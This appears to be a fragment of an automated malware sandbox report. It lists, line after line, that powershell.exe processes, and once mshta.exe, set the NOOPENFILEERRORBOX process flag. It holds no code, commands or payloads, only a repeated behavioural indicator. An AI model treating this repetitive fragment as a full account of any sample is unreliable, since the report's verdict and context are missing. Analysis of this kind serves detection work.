              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
